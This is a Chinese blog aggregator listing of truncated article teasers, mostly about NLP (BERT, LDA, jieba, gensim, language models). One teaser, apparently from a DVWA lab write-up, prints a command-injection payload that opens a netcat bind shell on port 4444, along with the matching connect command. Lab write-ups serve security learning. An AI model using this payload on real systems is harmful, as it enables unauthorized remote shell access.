本文(部分内容)翻译自文章 "A Visual Guide to Using BERT for the First Time" ,其作者为Jay Alammar,访问网址为: "http://jalammar.github.io/a visual guide to using bert for th ...
分类:
其他好文 时间:
2020-02-11 19:30:36
阅读次数:
152
概述 自然语言是非常复杂多变的,计算机也不认识咱们的语言,那么咱们如何让咱们的计算机学习咱们的语言呢?首先肯定得对咱们的所有文字进行编码吧,那咱们很多小伙伴肯定立马就想出了这还不简单嘛,咱们的计算机不都是ASCII编码的嘛,咱直接拿来用不就好啦?我只能说too young too simple。咱们 ...
分类:
其他好文 时间:
2020-02-09 20:47:29
阅读次数:
70
关于LDA主题模型,一度是NLP领域一个非常火的模型,后来深度学习大放异彩,它的热度才慢慢降了下来。由于数学基础很差,一直没有理解LDA的整个核心。到目前为止,也只是理解了皮毛。记录一下关于LDA主题模型相关的学习资料。LDA主题模型属于编码简单,但是数学功底要求较高的一个机器学习模型,在搜索引擎和广告领域有用到。按照《LDA数学八卦》作者靳志辉老师的说法,是一个比较简单的模型,前提是需要数学功底
分类:
其他好文 时间:
2020-02-08 23:15:33
阅读次数:
178
主要用于 NLP 处理,里面存在一些常量列表,包括数字、字母、大写字母、小写字母、标点符号、空格等。 参考:6.1. string — Common string operations 可以用于删除文本中的标点符号,将标点符号 replace 为 空。 >>> import string >>> s ...
分类:
编程语言 时间:
2020-02-07 19:10:15
阅读次数:
93
概念 统计语言模型是NLP的基础,是描述自然语言内在的规律的数学模型。广泛应用于各种自然语言处理问题,如语音识别、机器翻译、分词、词性标注等。 简单地说,统计语言模型就是给定一个句子W(由多个单词w1,w2,w3...组成),计算该句子可信(合理)的概率的模型,即$P(W)=P(w_1,w_2,w_ ...
分类:
编程语言 时间:
2020-02-07 16:29:54
阅读次数:
63
开门见山 ·Low ·Medium ·High · 命令执行监听端口 ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe nc 192.168.31.100 4444 · 反弹shell 拷贝shell文件 启动kali的apache服 ...
分类:
其他好文 时间:
2020-02-06 16:14:05
阅读次数:
88
该文主要采用“知识蒸馏”方法对BERT(预训练语言模型)精简、优化,将较大模型压缩成较小的模型,最终目的是:提高模型推理的效率,让运行在智能手机等硬件设备上的深度学习模型具有轻量级、响应快及能源利用率高等特性。 在2019年的NLP领域预训练+微调的模型训练思路百家争鸣,ElMo、GPT、BERT、 ...
分类:
其他好文 时间:
2020-02-03 20:58:10
阅读次数:
155
jieba简介 jieba库是一个简单实用的中文自然语言处理分词库。 jieba分词属于概率语言模型分词。概率语言模型分词的任务是:在全切分所得的所有结果中求某个切分方案S,使得P(S)最大。 jieba支持三种分词模式: 全模式,把句子中所有的可以成词的词语都扫描出来, 速度非常快,但是不能解决歧 ...
分类:
其他好文 时间:
2020-02-02 19:31:12
阅读次数:
108
转自:https://blog.csdn.net/Stupid_human/article/details/99414013 1.上下文相同的词,词义很大可能也相同。 比如这个例子中,单词可能意思是beer,和beer相似。 2.怎么做文本分类? 两篇文章的向量相似,那么两篇文章也相似。 3.htt ...
分类:
其他好文 时间:
2020-02-02 01:10:04
阅读次数:
65
https://radimrehurek.com/gensim/auto_examples/index.html#core-tutorials Calculate the similarity of any two course -Design a program to implement the ...
分类:
其他好文 时间:
2020-01-31 21:16:24
阅读次数:
140